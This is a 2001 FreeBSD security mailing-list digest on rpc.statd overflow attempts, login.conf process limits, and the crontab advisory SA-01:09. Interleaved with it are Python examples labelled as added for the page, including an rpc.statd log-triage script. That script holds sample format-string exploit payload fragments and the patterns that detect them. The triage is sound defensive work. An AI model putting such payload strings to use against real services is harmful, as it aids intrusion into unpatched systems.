process doing -bs Date: Thu, 25 Jan 2001 13:34:58 -0500 (EST) 
From: Joe Oliveiro X-Sender: joe@joe.pythonvideo.com To: "Steven G. Kargl" Cc: freebsd-security@FreeBSD.ORG Subject: Re: buffer overflows in rpc.statd? In-Reply-To: <200101251726.f0PHQei65827@troutmask.apl.washington.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org It's a RedHat thang, don't worry about fbsd's statd as it isn't prone to those problems. Microsoft: "Where would you like to go to today" Linux: "Where would you like to go tomorrow" FreeBSD: "Hey, when are you guys going to catch up" On Thu, 25 Jan 2001, Steven G. Kargl wrote: > Are there any known compromises of rpc.statd that involve > buffer overflows? I have several entries in /var/log/messages that > look suspicious, but I currently don't know what these entries > mean (see attachment). The suspicious entries appear to be > buffers that someone or something has tried to overflow. > > -- > Steve > http://troutmask.apl.washington.edu/~kargl/ > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 11: 6:27 2001 Delivered-To: freebsd-security@freebsd.org Received: from odin.ac.hmc.edu (Odin.AC.HMC.Edu [134.173.32.75]) by hub.freebsd.org (Postfix) with ESMTP id C711237B6AF for ; Thu, 25 Jan 2001 11:06:06 -0800 (PST) Received: (from brdavis@localhost) by odin.ac.hmc.edu (8.11.0/8.11.0) id f0PJ5uH17573; Thu, 25 Jan 2001 11:05:56 -0800 Date: Thu, 25 Jan 2001 11:05:56 -0800
From: Brooks Davis To: "Geoffrey T. Falk" Cc: freebsd-security@FreeBSD.ORG Subject: Re: rpc.statd bloat Message-ID: <20010125110556.B23406@Odin.AC.HMC.Edu> References: <200101251726.f0PHQei65827@troutmask.apl.washington.edu> <200101251810.LAA04410@h-209-91-79-2.gen.cadvision.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: <200101251810.LAA04410@h-209-91-79-2.gen.cadvision.com>; from gtf@cirp.org on Thu, Jan 25, 2001 at 11:10:25AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Jan 25, 2001 at 11:10:25AM -0700, Geoffrey T. Falk wrote: > In a related note: Is it normal for rpc.statd to bloat? rpc.statd on > boojum, my 4.0-RELEASE box, recently experienced a VSIZE > 274000. > > This box is an NFS server, but I don't think my NFS client (NEXTSTEP > 3.2) is using rpc.statd, because it runs just fine without it. It's not actually consuming anywhere near that much memory (or at least it shouldn't be). The problem is that it mmaps 256MB of a status file in /var so it can extend the file as needed without having to re-mmap it each time. This looks strange, but really only wastes a bit of address space in the process so it's pretty harmless. -- Brooks -- Any statement of the form "X is the one, true Y" is FALSE. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 11:16:12 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.189]) by hub.freebsd.org (Postfix) with SMTP id 2DDA937B6AD for ; Thu, 25 Jan 2001 11:15:50 -0800 (PST) Received: (qmail 2040 invoked by uid 1000); 25 Jan 2001 19:14:18 -0000 Date: Thu, 25 Jan 2001 21:14:18 +0200
From: Peter Pentchev To: Allen Edwards Cc: freebsd-security@freebsd.org Subject: Re: Newbie Post - Limiting processes Message-ID: <20010125211418.B1122@ringworld.oblivion.bg> Mail-Followup-To: Allen Edwards , freebsd-security@freebsd.org References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from aedwards@hiqinternet.com on Thu, Jan 25, 2001 at 01:31:42PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Jan 25, 2001 at 01:31:42PM -0500, Allen Edwards wrote: > Feel free to flame the newbie if he asks an off topic question (great now > I'm talking about myself in the 3rd person). > > Is there a way to limit a user to a certain number of processes? e.g. one > foreground and one background process. > > I am working on providing some shell accounts to a few clients who have > requested it and have heard of persons doing this. Well, you can limit the total number of processes a user is allowed to run at any given time, background or foreground alike. Look at the login.conf(5) manpage; you can define a custom login class for your shell users, so that limits are only enforced for them, and not for your privileged admin logins. 'maxproc' is the setting for the total number of processes; I don't think you can control the number of background processes, but if your users happen to run too many of those, they will not even be able to login later :) Actually, *one* foreground process is a bit too much - you need at least one for the shell and one for any program the user might run. Each shell pipe and/or other program fork is one more process. So.. tread lightly :) G'luck, Peter -- I've heard that this sentence is a rumor. 
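An added illustration of the maxproc limit Peter describes (example code written for this page, not from any poster): it parses a login.conf(5) fragment with a custom class, plus ps(1) output, and reports per user how close each account is to its class limit, counting processes with no controlling tty separately. The login.conf stanza, the ps listing and the user-to-class assignments are constructed sample data.

```python
"""Compare each user's process count with the maxproc limit of their
login.conf(5) class.  Example written for this page; the login.conf
fragment, the ps(1) listing and the class assignments below are all
constructed sample data, not taken from any real system.
"""
import re
from collections import defaultdict

# Constructed login.conf(5) fragment: a strict class for shell customers
# that inherits everything it does not set from 'default' via tc=.
LOGIN_CONF = r"""
default:\
    :passwd_format=md5:\
    :maxproc=64:\
    :umask=022:

shellusers|Limited shell customers:\
    :maxproc=5:\
    :tc=default:
"""

# Constructed 'ps -axo user,pid,ppid,tty,comm' output.  alice runs her
# shell plus a three-stage pipeline (three processes, as Peter notes) and
# one detached screen session; bob only has his shell.  '??' in the tty
# column marks a process with no controlling terminal.
PS_OUTPUT = """\
USER   PID  PPID TT  COMMAND
root     1     0 ??  init
alice  501   500 p1  sh
alice  523   501 p1  grep
alice  524   501 p1  sort
alice  525   501 p1  less
alice  530     1 ??  screen
bob    601   600 p2  sh
"""

# The login class of each account (what 'pw usermod -L' would set).
USER_CLASS = {"alice": "shellusers", "bob": "default", "root": "default"}


def parse_login_conf(text):
    """Return {class: {capability: value}} with tc= inheritance resolved."""
    records = {}
    spliced = re.sub(r"\\\n[ \t]*", "", text)      # join continuation lines
    for line in spliced.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = [f for f in line.split(":") if f]
        names = fields[0].split("|")               # 'name|long description'
        caps = {}
        for field in fields[1:]:
            key, _, value = field.partition("=")
            caps[key] = value if value else True   # boolean capability
        records[names[0]] = caps

    def resolve(name, seen=()):
        caps = dict(records.get(name, {}))
        parent = caps.pop("tc", None)
        if parent and parent not in seen:          # guard against tc= loops
            merged = resolve(parent, seen + (name,))
            merged.update(caps)                    # the child's own values win
            return merged
        return caps

    return {name: resolve(name) for name in records}


def maxproc_for(class_caps):
    """login.conf accepts maxproc or a maxproc-cur/maxproc-max pair."""
    for key in ("maxproc-cur", "maxproc", "maxproc-max"):
        if key in class_caps:
            return int(class_caps[key])
    return None                                    # no limit set for the class


def parse_ps(text):
    """Parse the fixed-column ps listing (header line first) into dicts."""
    rows = []
    for line in text.splitlines()[1:]:
        user, pid, ppid, tty, comm = line.split(None, 4)
        rows.append({"user": user, "pid": int(pid), "ppid": int(ppid),
                     "tty": tty, "comm": comm})
    return rows


def process_report(ps_rows, user_class, login_conf):
    """Per user: process count, class limit, detached count, at-limit flag."""
    by_user = defaultdict(list)
    for row in ps_rows:
        by_user[row["user"]].append(row)
    report = {}
    for user, rows in by_user.items():
        cls = user_class.get(user, "default")
        limit = maxproc_for(login_conf.get(cls, {}))
        report[user] = {
            "class": cls, "count": len(rows), "limit": limit,
            "detached": sum(1 for r in rows if r["tty"] == "??"),
            # At the limit the next fork() fails, so even a fresh login
            # shell cannot start: exactly the lock-out Peter warns about.
            "at_limit": limit is not None and len(rows) >= limit,
        }
    return report


if __name__ == "__main__":
    conf = parse_login_conf(LOGIN_CONF)
    for user, info in sorted(process_report(parse_ps(PS_OUTPUT), USER_CLASS, conf).items()):
        print(f"{user:6} class={info['class']:10} procs={info['count']}/{info['limit']} "
              f"detached={info['detached']} {'AT LIMIT' if info['at_limit'] else 'ok'}")
```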
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 11:23:53 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.189]) by hub.freebsd.org (Postfix) with SMTP id 3B86C37B6B0 for ; Thu, 25 Jan 2001 11:23:32 -0800 (PST) Received: (qmail 2098 invoked by uid 1000); 25 Jan 2001 19:22:01 -0000 Date: Thu, 25 Jan 2001 21:22:01 +0200 
From: Peter Pentchev To: Allen Edwards Cc: freebsd-security@freebsd.org Subject: Re: Newbie Post - Limiting processes Message-ID: <20010125212201.C1122@ringworld.oblivion.bg> Mail-Followup-To: Allen Edwards , freebsd-security@freebsd.org References: <20010125211418.B1122@ringworld.oblivion.bg> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010125211418.B1122@ringworld.oblivion.bg>; from roam@orbitel.bg on Thu, Jan 25, 2001 at 09:14:18PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Jan 25, 2001 at 09:14:18PM +0200, Peter Pentchev wrote: > On Thu, Jan 25, 2001 at 01:31:42PM -0500, Allen Edwards wrote: > > Feel free to flame the newbie if he asks an off topic question (great now > > I'm talking about myself in the 3rd person). > > > > Is there a way to limit a user to a certain number of processes? e.g. one > > foreground and one background process. > > > > I am working on providing some shell accounts to a few clients who have > > requested it and have heard of persons doing this. [snip] > Actually, *one* foreground process is a bit too much - you need ..surely 'a bit too STRICT' was what I meant :) > at least one for the shell and one for any program the user might > run. Each shell pipe and/or other program fork is one more process. > So.. tread lightly :) G'luck, Peter -- This inert sentence is my body, but my soul is alive, dancing in the sparks of your brain. 
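Going back to the rpc.statd entries that opened this digest: an added example (written for this page, not from any poster) that triages such syslog lines from a defender's side. It recognises the markers visible in the quoted entries, the %n format-string writes, the run of %8x stack pops, the repeated f7 ff bf bytes of a Linux stack address, and the M-^P (0x90) NOP sled, and counts attempts per day and RPC call. The log lines are constructed to resemble the thread's entries; nothing in the payload is decoded or executed.

```python
"""Triage rpc.statd 'invalid hostname' syslog lines for exploit attempts.

Example written for this page.  The sample lines are constructed to look
like the entries quoted in the thread; nothing is decoded or executed,
the script only classifies what syslogd already wrote to the log.
"""
import re
from collections import Counter

# Constructed sample log lines.  syslogd renders unprintable bytes as
# '\xNN' or 'M-^P'; the quoted-printable attachment in the thread rendered
# the same bytes as '=F7', so both spellings appear below.
LOG_LINES = [
    "Jan  8 03:35:28 troutmask rpc.statd: invalid hostname to sm_stat: "
    "^X\\xf7\\xff\\xbf^X\\xf7\\xff\\xbf%8x%8x%8x%8x%236x%n%137x%n%10x%n"
    + "M-^P" * 12,
    "Jan  8 03:35:28 troutmask /boot/kernel/kernel: ^PM-^PM-^PM-^P",
    "Jan  8 14:40:33 troutmask rpc.statd: Invalid hostname to sm_mon: "
    "^D=F7=FF=BF^D=F7=FF=BF%08x %08x %08x %08x %0242x%n%055x%n" + "M-^P" * 12,
    "Jan  9 10:12:02 troutmask rpc.statd: invalid hostname to sm_stat: "
    "nosuch.client.example",
    "Jan  9 14:21:57 troutmask rpc.statd: invalid hostname to sm_stat: "
    "^X\\xf7\\xff\\xbf%8x%8x%8x%8x%8x%236x%n",
]

STATD_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"rpc\.statd: [Ii]nvalid hostname to (?P<call>sm_\w+): (?P<payload>.*)$")

# Little-endian bytes f7 ff bf encode an address 0xbffff7xx.  A Linux i386
# user stack lives just below 0xc0000000; on FreeBSD 4.x/i386 user space
# ends below 0xbfc00000, so such an address is meaningless here.  That is
# the concrete reason the thread calls this a Linux exploit.
LINUX_STACK = "\\xf7\\xff\\xbf"


def normalize(payload):
    """Fold quoted-printable '=F7' and vis-style '\\xf7' into '\\xf7'."""
    return re.sub(r"(?:\\x|=)([0-9A-Fa-f]{2})",
                  lambda m: "\\x" + m.group(1).lower(), payload)


def classify(line):
    """Return a triage record for an rpc.statd line, or None for others."""
    m = STATD_RE.match(line)
    if not m:
        return None
    payload = normalize(m.group("payload"))
    indicators = set()
    if "%n" in payload:                       # %n = write via printf(3)
        indicators.add("format_string_write")
    if len(re.findall(r"%0?\d*x", payload)) >= 4:
        indicators.add("stack_walk")          # %8x... pops stack words
    if LINUX_STACK in payload:
        indicators.add("linux_stack_address")
    if payload.count("M-^P") >= 8 or payload.count("\\x90") >= 8:
        indicators.add("nop_sled")            # 0x90 = i386 NOP
    if "format_string_write" in indicators and (
            {"nop_sled", "linux_stack_address"} & indicators):
        verdict = "exploit_attempt"
    elif indicators:
        verdict = "suspicious"
    else:
        verdict = "benign"                    # e.g. a misconfigured client
    return {"day": " ".join(m.group("ts").split()[:2]),
            "host": m.group("host"), "call": m.group("call"),
            "indicators": indicators, "verdict": verdict}


def triage(lines):
    """Classify every rpc.statd line in the input; skip unrelated lines."""
    return [e for e in (classify(l) for l in lines) if e]


def summarize(events):
    """Count events per (day, RPC call, verdict) to see how often it recurs."""
    return Counter((e["day"], e["call"], e["verdict"]) for e in events)


if __name__ == "__main__":
    for (day, call, verdict), n in sorted(summarize(triage(LOG_LINES)).items()):
        print(f"{day:7} {call:8} {verdict:16} {n}")
```

These lines prove only that an attempt arrived, not where it came from; as David notes, a logging firewall rule in front of the RPC ports is what records the peer address.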
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 11:27: 8 2001 Delivered-To: freebsd-security@freebsd.org Received: from thegeneral.hiqinternet.com (unknown [216.166.222.134]) by hub.freebsd.org (Postfix) with ESMTP id 8B9EF37B6B1 for ; Thu, 25 Jan 2001 11:26:48 -0800 (PST) Received: from 9fzaf (laptop [216.166.222.130]) by thegeneral.hiqinternet.com (8.11.1/8.11.1) with SMTP id f0PJQM003060 for ; Thu, 25 Jan 2001 14:26:22 -0500 (EST) (envelope-from aedwards@hiqinternet.com) From: "Allen Edwards" To: Subject: RE: Newbie Post - Limiting processes Date: Thu, 25 Jan 2001 14:26:52 -0500 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) In-Reply-To: <20010125211418.B1122@ringworld.oblivion.bg> Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Thank you all kindly. I am the kind of newbie who has a few brain cells left, and little hints like a file existing called "login.conf" and the man works on it was a great help. Also thanks for the tips here, I had it set for 2 and might bump it up to 5. I got the idea of background process from a web-site that sells shell accounts. http://www.digital-galaxy.net/index2.htm They sell based on HDD space as well as background processes. Thanks again for everyone's help. Sincerely, Allen Edwards Sr. Applications Engineer Acucomm, Inc. Allen.Edwards@Acucomm.com AIM: AllenDWE ICQ# 54890016 -----Original Message----- 
From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Peter Pentchev Sent: Thursday, January 25, 2001 2:14 PM To: Allen Edwards Cc: freebsd-security@FreeBSD.ORG Subject: Re: Newbie Post - Limiting processes On Thu, Jan 25, 2001 at 01:31:42PM -0500, Allen Edwards wrote: > Feel free to flame the newbie if he asks an off topic question (great now > I'm talking about myself in the 3rd person). > > Is there a way to limit a user to a certain number of processes? e.g. one > foreground and one background process. > > I am working on providing some shell accounts to a few clients who have > requested it and have heard of persons doing this. Well, you can limit the total number of processes a user is allowed to run at any given time, background or foreground alike. Look at the login.conf(5) manpage; you can define a custom login class for your shell users, so that limits are only enforced for them, and not for your privileged admin logins. 'maxproc' is the setting for the total number of processes; I don't think you can control the number of background processes, but if your users happen to run too many of those, they will not even be able to login later :) Actually, *one* foreground process is a bit too much - you need at least one for the shell and one for any program the user might run. Each shell pipe and/or other program fork is one more process. So.. tread lightly :) G'luck, Peter -- I've heard that this sentence is a rumor. 
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 11:40: 8 2001 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id CE69637B6B4 for ; Thu, 25 Jan 2001 11:39:45 -0800 (PST) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id UAA90705; Thu, 25 Jan 2001 20:39:37 +0100 (CET) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: "Allen Edwards" Cc: Subject: Re: Newbie Post - Limiting processes References: 
From: Dag-Erling Smorgrav Date: 25 Jan 2001 20:39:36 +0100 In-Reply-To: "Allen Edwards"'s message of "Thu, 25 Jan 2001 14:26:52 -0500" Message-ID: Lines: 11 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Allen Edwards" writes: > They sell based on HDD space as well as background processes. Without reading their site, I imagine that what they mean by "background processes" are processes that run while the user is not logged in (usually these are IRC proxies or various kinds of file transfer clients). DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 11:41:18 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.189]) by hub.freebsd.org (Postfix) with SMTP id DB12237B6B6 for ; Thu, 25 Jan 2001 11:40:55 -0800 (PST) Received: (qmail 2322 invoked by uid 1000); 25 Jan 2001 19:39:24 -0000 Date: Thu, 25 Jan 2001 21:39:24 +0200 
From: Peter Pentchev
To: Allen Edwards
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Newbie Post - Limiting processes
Message-ID: <20010125213924.E1122@ringworld.oblivion.bg>
References: <20010125211418.B1122@ringworld.oblivion.bg>

On Thu, Jan 25, 2001 at 02:26:52PM -0500, Allen Edwards wrote:
> Thank you all kindly. I am the kind of newbie who has a few brain cells
> left, and little hints like a file existing called "login.conf" and the man
> works on it was a great help. Also thanks for the tips here, I had it set
> for 2 and might bump it up to 5.
>
> I got the idea of background process from a web-site that sells shell
> accounts.
>
> http://www.digital-galaxy.net/index2.htm
>
> They sell based on HDD space as well as background processes.
>
> Thanks again for everyone's help.

An additional point. You can limit the number of background processes with some daemon which wakes up periodically, then either does a ps, or uses libkvm to gather process info, and looks for such. It's something that's not too hard to do in Perl.. there are some race conditions to bear in mind, but writing a mostly-working version won't be too hard.

You might also want to do something like:

find /tmp/screens -type s -ls

and add this to the background processes' number. This is a quite commonly used trick - running processes inside a detached screen session. How to detect *which* processes are actually run within that particular session.. well, the filename of the screen socket is easily parseable into a pid - in the already-built process tree, look for children of that pid, and add *them*, too, to the background processes you might want to kill.
For a very primitive example of building a process tree in a Perl script, look at the sysutils/pslist port.

G'luck,
Peter

-- 
This inert sentence is my body, but my soul is alive, dancing in the sparks of your brain.
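The periodic check Peter sketches above, as an added example that is not part of the thread (written in Python rather than the Perl he suggests): it parses ps(1) output into a process tree, counts each user's processes without a controlling tty as background, and folds in the children of detached screen sessions found through their socket file names. The ps output, user names, host name and socket paths are constructed sample data, and skipping root's daemons is this example's own assumption.

```python
import re
from collections import defaultdict

# Constructed sample of `ps -axo pid,ppid,user,tty,command` on a BSD system
# ("??" in the TT column means no controlling tty).  Not real output.
PS_OUTPUT = """\
  PID  PPID USER     TT  COMMAND
    1     0 root     ??  /sbin/init
  200     1 root     ??  /usr/sbin/sshd
  310   200 alice    p0  -bash
  311   310 alice    p0  vim notes.txt
  400     1 alice    ??  screen -dmS irc
  401   400 alice    p2  -bash
  402   401 alice    p2  irssi
  500     1 bob      ??  ./bnc
  501     1 bob      p1  -tcsh
"""

# Constructed socket names as `find /tmp/screens -type s` would print them.
# screen names its sockets <pid>.<tty>.<host>, so the session pid parses out.
SCREEN_SOCKETS = [
    "/tmp/screens/S-alice/400.pts-1.shellbox",
    "/tmp/screens/S-bob/999.pts-3.shellbox",   # stale socket: no such pid
]

_SOCKET_RE = re.compile(r"/S-[^/]+/(?P<pid>\d+)\.")


def parse_ps(text):
    """Turn ps(1) output into {pid: {"ppid", "user", "tty", "command"}}."""
    procs = {}
    for line in text.splitlines()[1:]:          # skip the header row
        fields = line.split(None, 4)
        if len(fields) < 5:
            continue
        pid, ppid, user, tty, command = fields
        procs[int(pid)] = {"ppid": int(ppid), "user": user,
                           "tty": tty, "command": command}
    return procs


def children_of(procs):
    """Parent pid -> list of child pids, i.e. the process tree."""
    tree = defaultdict(list)
    for pid, info in procs.items():
        tree[info["ppid"]].append(pid)
    return tree


def descendants(tree, root):
    """Every pid below root in the tree (root itself excluded)."""
    found, stack = set(), list(tree.get(root, []))
    while stack:
        pid = stack.pop()
        if pid not in found:
            found.add(pid)
            stack.extend(tree.get(pid, []))
    return found


def screen_session_pids(socket_paths, procs):
    """Pids parsed from screen socket names, ignoring sockets with no live pid."""
    pids = set()
    for path in socket_paths:
        m = _SOCKET_RE.search(path)
        if m and int(m.group("pid")) in procs:
            pids.add(int(m.group("pid")))
    return pids


def background_processes(procs, socket_paths):
    """Per-user set of pids counted as background.

    A process counts when it has no controlling tty ("??"); everything
    running inside a detached screen session is added as well, because
    those children do have a pseudo-tty and would otherwise be missed.
    root's daemons are skipped: they are not the shell users being limited
    (an assumption of this example, not something the post specifies).
    """
    tree = children_of(procs)
    result = defaultdict(set)
    for pid, info in procs.items():
        if info["user"] != "root" and info["tty"] == "??":
            result[info["user"]].add(pid)
    for spid in screen_session_pids(socket_paths, procs):
        owner = procs[spid]["user"]
        result[owner].add(spid)
        result[owner].update(descendants(tree, spid))
    return dict(result)


def over_limit(procs, socket_paths, limit):
    """Sorted list of users with more than `limit` background processes."""
    counts = background_processes(procs, socket_paths)
    return sorted(u for u, pids in counts.items() if len(pids) > limit)


if __name__ == "__main__":
    procs = parse_ps(PS_OUTPUT)
    for user, pids in sorted(background_processes(procs, SCREEN_SOCKETS).items()):
        print(user, sorted(pids))
    print("over limit of 1:", over_limit(procs, SCREEN_SOCKETS, 1))
```

On a real host the two constants would be replaced by the output of ps(1) and find(1) taken on each wake-up; the race Peter mentions (a pid exiting between the two snapshots) is why stale socket pids are dropped rather than counted.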

From: Peter Pentchev
To: Dag-Erling Smorgrav
Cc: Allen Edwards, freebsd-security@FreeBSD.ORG
Subject: Re: Newbie Post - Limiting processes
Date: Thu, 25 Jan 2001 21:42:35 +0200
Message-ID: <20010125214235.F1122@ringworld.oblivion.bg>

On Thu, Jan 25, 2001 at 08:39:36PM +0100, Dag-Erling Smorgrav wrote:
> "Allen Edwards" writes:
> > They sell based on HDD space as well as background processes.
>
> Without reading their site, I imagine that what they mean by
> "background processes" are processes that run while the user is not
> logged in (usually these are IRC proxies or various kinds of file
> transfer clients).

I've seen a shell provider or five that considers a process to be a background process when it does not have a controlling tty. It's in such cases that people tend to use the screen workaround I mentioned in another mail in this thread.

G'luck,
Peter

-- 
This sentence contradicts itself - or rather - well, no, actually it doesn't!

From owner-freebsd-security Thu Jan 25 12:33:13 2001
Date: Thu, 25 Jan 2001 15:39:10 -0500 (EST)
From: Ralph Huntington
To: Allen Edwards
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Newbie Post - Limiting processes

This question and the follow-ups belong on questions@FreeBSD.org and not on security. Thank you.

-=r=-

On Thu, 25 Jan 2001, Allen Edwards wrote:
> Feel free to flame the newbie if he asks an off topic question (great now
> I'm talking about myself in the 3rd person).
>
> Is there a way to limit a user to a certain number of processes? e.g. one
> foreground and one background process.
>
> I am working on providing some shell accounts to a few clients who have
> requested it and have heard of persons doing this.
>
> Sincerely,
> Allen Edwards

From owner-freebsd-security Thu Jan 25 13:02:06 2001
Date: Thu, 25 Jan 2001 13:01:37 -0800 (PST)
Message-Id: <200101252101.f0PL1bs78217@freefall.freebsd.org>
From: FreeBSD Security Advisories
To: FreeBSD Security Advisories
Subject: FreeBSD Security Advisory: FreeBSD-SA-01:09.crontab [REVISED]
Reply-To: security-advisories@FreeBSD.org

=============================================================================
FreeBSD-SA-01:09                                           Security Advisory
                                                                FreeBSD, Inc.

Topic:          crontab allows users to read certain files [REVISED]

Category:       core
Module:         crontab
Announced:      2001-01-23
Revised:        2001-01-25
Credits:        Kyong-won Cho
                Patch obtained from OpenBSD (Todd Miller)
Affects:        FreeBSD 3.x (all releases), 4.x (all releases prior to 4.2)
                FreeBSD 3.5.1-STABLE and 4.1.1-STABLE prior to the
                correction date.
Corrected:      2000-11-11 (FreeBSD 4.1.1-STABLE)
                2000-11-20 (FreeBSD 3.5.1-STABLE)
FreeBSD only:   No

0.   Revision History

v1.0  2001-01-23  Initial release
v1.1  2001-01-25  Update to credit OpenBSD as source of patch

I.   Background

crontab(8) is a program to edit crontab(5) files for use by the cron daemon, which schedules jobs to run at specified times.

II.  Problem Description

crontab(8) was discovered to contain a vulnerability that may allow local users to read any file on the system that conforms to a valid crontab(5) file syntax. Due to crontab(5) syntax requirements, the files that may be read are limited and subject to the following restrictions:

* The file is a valid crontab(5) file, or:

* The file is entirely commented out; every line contains either only whitespace, or begins with a '#' character.

The greatest security vulnerability is the disclosure of crontab entries owned by other users, which may contain sensitive data such as keying material (although this would often be publicly disclosed anyway at the time when the crontab job executes, via process arguments and environment, etc).

All released versions of FreeBSD prior to the correction date including FreeBSD 4.1.1 are vulnerable to this problem.
The problem was corrected prior to the release of FreeBSD 4.2.

III. Impact

Malicious local users can read arbitrary local files that conform to a valid crontab file syntax.

IV.  Workaround

One of the following:

1) Utilize crontab allow/deny files (/var/cron/allow and /var/cron/deny) to limit access to use the crontab(8) utility.

2) Remove the setuid privileges from /usr/sbin/crontab. However, this will not allow users other than root to use cron.

V.   Solution

One of the following:

Upgrade the vulnerable FreeBSD system to 3.5-STABLE or 4.1.1-STABLE after the correction date.

To patch your present system: download the relevant patch from the below location and execute the following commands as root:

ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:09/crontab-4.x.patch
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:09/crontab-4.x.patch.asc

Verify the detached PGP signature using your PGP utility.

# cd /usr/src/usr.sbin/cron/crontab
# patch -p < /path/to/patch
# make depend && make all install

From owner-freebsd-security Thu Jan 25 13:12:57 2001
Date: Thu, 25 Jan 2001 13:12:35 -0800
From: FreeBSD Security Advisories
To: freebsd-security@freebsd.org
Subject: HEADS UP: Problem with advisory delivery
Message-ID: <20010125131235.A81121@freefall.freebsd.org>

Hi all,

There is something apparently broken with majordomo which is causing it to reject two of the recent advisories from being sent to the FreeBSD lists. Security advisories SA-01:07 and SA-01:10 are released (and made it to bugtraq), but have not shown up on the lists yet, despite re-sending.

They'll be sent out as soon as jmb or someone can sort out the problem, in the meantime you can obtain them here:

ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-01:07.xfree86.asc
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-01:10.bind.asc

Sorry for the inconvenience

Kris

From owner-freebsd-security Thu Jan 25 13:14:31 2001
Date: Thu, 25 Jan 2001 13:17:31 -0800
From: Kris Kennaway
To: "Geoffrey T. Falk"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: rpc.statd bloat
Message-ID: <20010125131731.A62681@citusc17.usc.edu>
References: <200101251726.f0PHQei65827@troutmask.apl.washington.edu> <200101251810.LAA04410@h-209-91-79-2.gen.cadvision.com>
In-Reply-To: <200101251810.LAA04410@h-209-91-79-2.gen.cadvision.com>

On Thu, Jan 25, 2001 at 11:10:25AM -0700, Geoffrey T. Falk wrote:
> In a related note: Is it normal for rpc.statd to bloat? rpc.statd on
> boojum, my 4.0-RELEASE box, recently experienced a VSIZE > 274000.
>
> This box is an NFS server, but I don't think my NFS client (NEXTSTEP
> 3.2) is using rpc.statd, because it runs just fine without it.

Yes. It's not actually using that memory. See the archives or the FAQ for more.
Kris
-- 
NOTE: To fetch an updated copy of my GPG key which has not expired, finger kris@FreeBSD.org

From owner-freebsd-security Thu Jan 25 13:37:18 2001
Message-Id: <200101252135.f0PLZg974354@harmony.village.org>
To: Cy Schubert - ITSD Open Systems Group
Subject: Re: Where did FreeBSD-SA-01:07 and 10 go?
Cc: Andrey Lakhno, Jan Conrad, security@FreeBSD.ORG
In-reply-to: Your message of "Thu, 25 Jan 2001 06:17:10 PST." <200101251417.f0PEHKk14619@cwsys.cwsent.com>
References: <200101251417.f0PEHKk14619@cwsys.cwsent.com>
Date: Thu, 25 Jan 2001 14:35:42 -0700
From: Warner Losh

In message <200101251417.f0PEHKk14619@cwsys.cwsent.com> Cy Schubert - ITSD Open Systems Group writes:
: I saw them on BUGTRAQ but not on -security or -announce

They aren't in the announce archives.

Warner

From owner-freebsd-security Thu Jan 25 14:08:00 2001
Date: Thu, 25 Jan 2001 17:07:09 -0500 (EST)
From: Matt Piechota
To: "Steven G. Kargl"
Subject: Re: buffer overflows in rpc.statd?
